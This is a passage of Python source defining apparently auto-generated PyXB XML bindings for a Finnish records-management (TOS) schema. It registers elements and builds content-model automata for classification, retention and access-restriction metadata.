Toimenpidetiedot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot'), toimenpidetiedotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Toimenpidetiedot.name().localName(), Toimenpidetiedot)
Asiakirjatieto = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Asiakirjatieto'), asiakirjatietoTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Asiakirjatieto.name().localName(), Asiakirjatieto)
# Attach the locally-scoped child element declarations to CTD_ANON (the
# anonymous complex type of the root 'Tos' element).
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TosTiedot'), TosTiedotTyyppi, scope=CTD_ANON, location=None))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Luokka'), luokkaTyyppi, scope=CTD_ANON, location=None))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=CTD_ANON, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
def _BuildAutomaton ():
    """Build the FAC content-model automaton for CTD_ANON ('Tos').

    Constructs a finite automaton with counters whose transition table
    encodes (approximately) the content model: TosTiedot, Luokka+,
    Laajennos*.  Self-deleting one-shot helper.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton
    del _BuildAutomaton
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: occurrence counter with min=0, no upper bound — governs the
    # repeatable Laajennos state (st_2) below.
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=None)
    counters.add(cc_0)
    states = []
    # st_0: TosTiedot — initial state; final_update=None means it is not
    # an accepting state, so TosTiedot alone does not complete the content.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TosTiedot')), None)
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: Luokka — accepting; self-loop below allows repetition.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Luokka')), None)
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: Laajennos — accepting; its repetition is tracked by cc_0.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # Transition table: st_0 -> st_1; st_1 -> {st_1, st_2}; st_2 -> st_2
    # (incrementing cc_0 on each repeat).
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_2._set_transitionSet(transitions)
    # Third argument False: the empty sequence is not accepted.
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON._Automaton = _BuildAutomaton()
def _BuildAutomaton_ ():
    """Build the FAC content-model automaton for CTD_ANON_ ('Laajennos').

    The model is a single accepting state that matches any element via a
    skip-processed wildcard, with no counters and no outgoing transitions.
    """
    # One-shot helper: remove it from the module namespace once invoked.
    global _BuildAutomaton_
    del _BuildAutomaton_
    import pyxb.utils.fac as fac
    # Wildcard symbol: any namespace, contents skipped by the processor.
    any_wildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_skip, namespace_constraint=pyxb.binding.content.Wildcard.NC_any)
    sole_state = fac.State(pyxb.binding.content.WildcardUse(any_wildcard, None), is_initial=True, final_update=set(), is_unordered_catenation=False)
    sole_state._set_transitionSet([])
    # Non-nullable automaton (empty content is not accepted) with a single state.
    return fac.Automaton([sole_state], set(), False, containing_state=None)
CTD_ANON_._Automaton = _BuildAutomaton_()
# Attach the locally-scoped child element declarations to nimekeTyyppi.
nimekeTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti'), nimekeTekstiTyyppi, scope=nimekeTyyppi, location=None))
nimekeTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NimekeKielella'), nimekeKielellaTyyppi, scope=nimekeTyyppi, location=None))
def _BuildAutomaton_2 ():
    """Build the FAC content-model automaton for nimekeTyyppi.

    Two accepting states, both valid entry points: a choice between one
    NimekeTeksti or one-or-more NimekeKielella (st_0 self-loops; st_1 has
    no outgoing transitions).  Self-deleting one-shot helper.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_2
    del _BuildAutomaton_2
    import pyxb.utils.fac as fac
    counters = set()
    states = []
    # st_0: NimekeKielella — initial and accepting; self-loop allows repeats.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(nimekeTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'NimekeKielella')), None)
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: NimekeTeksti — initial and accepting; terminal (no transitions).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(nimekeTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti')), None)
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    transitions = []
    transitions.append(fac.Transition(st_0, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    st_1._set_transitionSet(transitions)
    # Third argument False: empty content is not accepted.
    return fac.Automaton(states, counters, False, containing_state=None)
nimekeTyyppi._Automaton = _BuildAutomaton_2()
# Attach the locally-scoped child element declarations to asiasanatTyyppi.
asiasanatTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiasanastoTeksti'), pyxb.binding.datatypes.string, scope=asiasanatTyyppi, location=None))
asiasanatTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiasanaTeksti'), pyxb.binding.datatypes.string, scope=asiasanatTyyppi, location=None))
def _BuildAutomaton_3 ():
    """Build the FAC content-model automaton for asiasanatTyyppi.

    Encodes (approximately) AsiasanastoTeksti*, AsiasanaTeksti* — both
    states are optional/repeatable (counters cc_0/cc_1) and the automaton
    is nullable.  Self-deleting one-shot helper.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_3
    del _BuildAutomaton_3
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0 / cc_1: unbounded occurrence counters for the two states below.
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=None)
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=None, metadata=None)
    counters.add(cc_1)
    states = []
    # st_0: AsiasanastoTeksti — initial, accepting, repeatable via cc_0.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(asiasanatTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'AsiasanastoTeksti')), None)
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: AsiasanaTeksti — initial, accepting, repeatable via cc_1.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(asiasanatTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'AsiasanaTeksti')), None)
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_0 may repeat (incrementing cc_0) or advance to st_1 (resetting cc_0);
    # st_1 may only repeat (incrementing cc_1).
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_1, True) ]))
    st_1._set_transitionSet(transitions)
    # Third argument True: the automaton is nullable (empty content allowed).
    return fac.Automaton(states, counters, True, containing_state=None)
asiasanatTyyppi._Automaton = _BuildAutomaton_3()
# Attach the locally-scoped child element declarations to kasittelysaannotTyyppi.
# The Finnish 'documentation=' strings originate from the schema annotations.
kasittelysaannotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaMuutosTeksti'), pyxb.binding.datatypes.string, scope=kasittelysaannotTyyppi, documentation='Esimerkiksi: Asian päättäminen, Päätöksenteko (toimenpide), Päätöksen allekirjoitus (toimenpide).', location=None))
kasittelysaannotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AiempienVersioidenPoistoTeksti'), pyxb.binding.datatypes.string, scope=kasittelysaannotTyyppi, documentation='Suositeltavat: Asian ratkaisu, Tietty aika asian ratkaisusta, Asiakirjan hävittäminen.', location=None))
kasittelysaannotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TallennuspaikkaTeksti'), pyxb.binding.datatypes.string, scope=kasittelysaannotTyyppi, location=None))
kasittelysaannotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytyspaikkaTeksti'), pyxb.binding.datatypes.string, scope=kasittelysaannotTyyppi, location=None))
kasittelysaannotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=kasittelysaannotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
def _BuildAutomaton_4 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_4
    del _BuildAutomaton_4
    import pyxb.utils.fac as fac
    # Content model for kasittelysaannotTyyppi: five optional particles in
    # sequence, of which only the trailing 'Laajennos' may repeat.  The
    # automaton below is the standard PyXB encoding of such a model: one
    # counter per particle, one state per particle, a self-loop that bumps
    # the particle's own counter, and forward edges that finalize it.
    element_tags = (
        'JulkisuusluokkaMuutosTeksti',
        'AiempienVersioidenPoistoTeksti',
        'TallennuspaikkaTeksti',
        'SailytyspaikkaTeksti',
        'Laajennos',
    )
    last = len(element_tags) - 1
    counters = set()
    conditions = []
    for position in range(len(element_tags)):
        # Every particle occurs at most once except the final one, which is
        # unbounded (max=None).
        cc = fac.CounterCondition(min=0, max=(None if position == last else 1), metadata=None)
        counters.add(cc)
        conditions.append(cc)
    states = []
    for cc, tag in zip(conditions, element_tags):
        use = kasittelysaannotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag))
        symbol = pyxb.binding.content.ElementUse(use, None)
        # All states are initial because every earlier particle is optional;
        # each state accepts once its own counter has been finalized.
        states.append(fac.State(symbol, is_initial=True,
                                final_update=set([fac.UpdateInstruction(cc, False)]),
                                is_unordered_catenation=False))
    for position, (cc, state) in enumerate(zip(conditions, states)):
        # Self-loop increments this particle's counter; advancing to any
        # later particle finalizes it instead.
        transitions = [fac.Transition(state, [fac.UpdateInstruction(cc, True)])]
        for successor in states[position + 1:]:
            transitions.append(fac.Transition(successor, [fac.UpdateInstruction(cc, False)]))
        state._set_transitionSet(transitions)
    # Nullable automaton: the wholly-optional content model matches the
    # empty sequence.
    return fac.Automaton(states, counters, True, containing_state=None)
# Attach the finished content-model automaton to kasittelysaannotTyyppi.
kasittelysaannotTyyppi._Automaton = _BuildAutomaton_4()
# Register the element particles of the kayttorajoitusTiedotTyyppi complex
# type.  Auto-generated PyXB bindings; each element is bound to its
# schema-declared simple/complex type object.
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaKoodi'), julkisuusluokkaKoodiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoAikaArvo'), salassapitoAikaArvoTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoPerusteTeksti'), salassapitoPerusteTekstiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapidonLaskentaperusteTeksti'), salassapidonLaskentaperusteTekstiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SuojaustasoKoodi'), suojaustasoKoodiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TurvallisuusluokkaKoodi'), turvallisuusluokkaKoodiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HenkilotietoluonneKoodi'), henkilotietoluonneKoodiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
# 'Laajennos' is the generic extension element shared by several types here.
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=kayttorajoitusTiedotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
def _BuildAutomaton_5 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_5
    del _BuildAutomaton_5
    import pyxb.utils.fac as fac
    # Content model for kayttorajoitusTiedotTyyppi: eight optional particles
    # in sequence, of which only the trailing 'Laajennos' may repeat.  Note
    # the automaton's state order below is the content-model order, which
    # differs from the order the elements were registered in.
    element_tags = (
        'JulkisuusluokkaKoodi',
        'SuojaustasoKoodi',
        'TurvallisuusluokkaKoodi',
        'HenkilotietoluonneKoodi',
        'SalassapitoAikaArvo',
        'SalassapitoPerusteTeksti',
        'SalassapidonLaskentaperusteTeksti',
        'Laajennos',
    )
    last = len(element_tags) - 1
    counters = set()
    conditions = []
    for position in range(len(element_tags)):
        # Every particle occurs at most once except the final one, which is
        # unbounded (max=None).
        cc = fac.CounterCondition(min=0, max=(None if position == last else 1), metadata=None)
        counters.add(cc)
        conditions.append(cc)
    states = []
    for cc, tag in zip(conditions, element_tags):
        use = kayttorajoitusTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag))
        symbol = pyxb.binding.content.ElementUse(use, None)
        # All states are initial because every earlier particle is optional;
        # each state accepts once its own counter has been finalized.
        states.append(fac.State(symbol, is_initial=True,
                                final_update=set([fac.UpdateInstruction(cc, False)]),
                                is_unordered_catenation=False))
    for position, (cc, state) in enumerate(zip(conditions, states)):
        # Self-loop increments this particle's counter; advancing to any
        # later particle finalizes it instead.
        transitions = [fac.Transition(state, [fac.UpdateInstruction(cc, True)])]
        for successor in states[position + 1:]:
            transitions.append(fac.Transition(successor, [fac.UpdateInstruction(cc, False)]))
        state._set_transitionSet(transitions)
    # Nullable automaton: the wholly-optional content model matches the
    # empty sequence.
    return fac.Automaton(states, counters, True, containing_state=None)
# Attach the finished content-model automaton to kayttorajoitusTiedotTyyppi.
kayttorajoitusTiedotTyyppi._Automaton = _BuildAutomaton_5()
# Register the element particles of the sailytysaikaTiedotTyyppi complex
# type.  Auto-generated PyXB bindings.
sailytysaikaTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPituusArvo'), sailytysajanPituusArvoTyyppi, scope=sailytysaikaTiedotTyyppi, location=None))
sailytysaikaTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPerusteTeksti'), sailytysajanPerusteTekstiTyyppi, scope=sailytysaikaTiedotTyyppi, location=None))
sailytysaikaTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanLaskentaperusteTeksti'), sailytysajanLaskentaperusteTekstiTyyppi, scope=sailytysaikaTiedotTyyppi, location=None))
# 'Laajennos' is the generic extension element shared by several types here.
sailytysaikaTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=sailytysaikaTiedotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
def _BuildAutomaton_6 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_6
    del _BuildAutomaton_6
    import pyxb.utils.fac as fac
    # Content model for sailytysaikaTiedotTyyppi: four optional particles in
    # sequence, of which only the trailing 'Laajennos' may repeat.
    element_tags = (
        'SailytysajanPituusArvo',
        'SailytysajanPerusteTeksti',
        'SailytysajanLaskentaperusteTeksti',
        'Laajennos',
    )
    last = len(element_tags) - 1
    counters = set()
    conditions = []
    for position in range(len(element_tags)):
        # Every particle occurs at most once except the final one, which is
        # unbounded (max=None).
        cc = fac.CounterCondition(min=0, max=(None if position == last else 1), metadata=None)
        counters.add(cc)
        conditions.append(cc)
    states = []
    for cc, tag in zip(conditions, element_tags):
        use = sailytysaikaTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag))
        symbol = pyxb.binding.content.ElementUse(use, None)
        # All states are initial because every earlier particle is optional;
        # each state accepts once its own counter has been finalized.
        states.append(fac.State(symbol, is_initial=True,
                                final_update=set([fac.UpdateInstruction(cc, False)]),
                                is_unordered_catenation=False))
    for position, (cc, state) in enumerate(zip(conditions, states)):
        # Self-loop increments this particle's counter; advancing to any
        # later particle finalizes it instead.
        transitions = [fac.Transition(state, [fac.UpdateInstruction(cc, True)])]
        for successor in states[position + 1:]:
            transitions.append(fac.Transition(successor, [fac.UpdateInstruction(cc, False)]))
        state._set_transitionSet(transitions)
    # Nullable automaton: the wholly-optional content model matches the
    # empty sequence.
    return fac.Automaton(states, counters, True, containing_state=None)
# Attach the finished content-model automaton to sailytysaikaTiedotTyyppi.
sailytysaikaTiedotTyyppi._Automaton = _BuildAutomaton_6()
# Register the element particles of the TosTiedotTyyppi complex type.
# Auto-generated PyXB bindings; several elements reuse types from the
# imported 'jhs' metarecord binding module.
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi'), tilaKoodiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TosVersio'), versioTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LisatiedotTeksti'), lisatiedotTekstiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'YhteyshenkiloNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=TosTiedotTyyppi, location=None))
# 'Laajennos' is the generic extension element shared by several types here.
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=TosTiedotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Nimeke'), nimekeTyyppi, scope=TosTiedotTyyppi, location=None))
def _BuildAutomaton_7 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_7
    del _BuildAutomaton_7
    import pyxb.utils.fac as fac
    # Content model for TosTiedotTyyppi: three required, ordered particles
    # (Nimeke, YhteyshenkiloNimi, TosVersio), then twelve optional particles
    # in sequence of which only the trailing 'Laajennos' may repeat.
    optional_tags = (
        'TilaKoodi',
        'OrganisaatioNimi',
        'LaatijaNimi',
        'LaadittuPvm',
        'MuokkaajaNimi',
        'MuokattuPvm',
        'HyvaksyjaNimi',
        'HyvaksyttyPvm',
        'VoimassaoloAlkaaPvm',
        'VoimassaoloPaattyyPvm',
        'LisatiedotTeksti',
        'Laajennos',
    )
    last = len(optional_tags) - 1
    counters = set()
    conditions = []
    for position in range(len(optional_tags)):
        # Every optional particle occurs at most once except the final one,
        # which is unbounded (max=None).
        cc = fac.CounterCondition(min=0, max=(None if position == last else 1), metadata=None)
        counters.add(cc)
        conditions.append(cc)
    states = []

    def make_state(tag, initial, final_update):
        # Build one automaton state for the named element particle and
        # record it in content-model order.
        use = TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag))
        symbol = pyxb.binding.content.ElementUse(use, None)
        st = fac.State(symbol, is_initial=initial, final_update=final_update,
                       is_unordered_catenation=False)
        states.append(st)
        return st

    # Required prefix: only Nimeke can start a document; the first two
    # states are non-accepting (final_update=None), TosVersio accepts with
    # no counter updates (empty set).
    st_nimeke = make_state('Nimeke', True, None)
    st_yhteyshenkilo = make_state('YhteyshenkiloNimi', False, None)
    st_versio = make_state('TosVersio', False, set())
    optional_states = [
        make_state(tag, False, set([fac.UpdateInstruction(cc, False)]))
        for tag, cc in zip(optional_tags, conditions)
    ]
    # Fixed chain through the required particles (no counter updates).
    st_nimeke._set_transitionSet([fac.Transition(st_yhteyshenkilo, [])])
    st_yhteyshenkilo._set_transitionSet([fac.Transition(st_versio, [])])
    # After TosVersio any of the optional particles may follow directly.
    st_versio._set_transitionSet([fac.Transition(st, []) for st in optional_states])
    for position, (cc, state) in enumerate(zip(conditions, optional_states)):
        # Self-loop increments this particle's counter; advancing to any
        # later particle finalizes it instead.
        transitions = [fac.Transition(state, [fac.UpdateInstruction(cc, True)])]
        for successor in optional_states[position + 1:]:
            transitions.append(fac.Transition(successor, [fac.UpdateInstruction(cc, False)]))
        state._set_transitionSet(transitions)
    # Not nullable: the required prefix must always be matched.
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the compiled content-model automaton for TosTiedotTyyppi.
TosTiedotTyyppi._Automaton = _BuildAutomaton_7()

# Register the element declarations that may appear inside luokkaTyyppi.
# Each _AddElement call binds an XML element name (expanded in Namespace)
# to its PyXB type binding, scoped to luokkaTyyppi.
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi'), tilaKoodiTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OsaVersio'), versioTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Luokitustunnus'), luokitustunnusTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LuokitusKuvausTeksti'), kuvausTekstiTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, scope=luokkaTyyppi, location=None))
# The following elements reuse types imported from the jhs metarecord binding.
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, scope=luokkaTyyppi, location=None))
# 'Laajennos' carries the schema's own documentation string (organisation-specific extension point).
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=luokkaTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Nimeke'), nimekeTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessiTiedot'), kasittelyprosessiTiedotTyyppi, scope=luokkaTyyppi, location=None))
def _BuildAutomaton_8 ():
    """Build the finite-automaton content model for luokkaTyyppi.

    Auto-generated (PyXB) counter-automaton construction.  Counters with
    min=0, max=1 bound optional single-occurrence particles; max=None
    marks an unbounded particle.  Judging from the transition tables,
    the model appears to be an ordered sequence of optional header
    elements, then Luokitustunnus, optional TilaKoodi/OsaVersio, Nimeke,
    optional LuokitusKuvausTeksti/KasittelyprosessiTiedot, and a
    repeatable Laajennos tail — TODO confirm against the source XSD.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_8
    del _BuildAutomaton_8
    import pyxb.utils.fac as fac
    # Occurrence counters; cc_0..cc_12 are optional (0..1), cc_13 is unbounded.
    counters = set()
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_1)
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_2)
    cc_3 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_3)
    cc_4 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_4)
    cc_5 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_5)
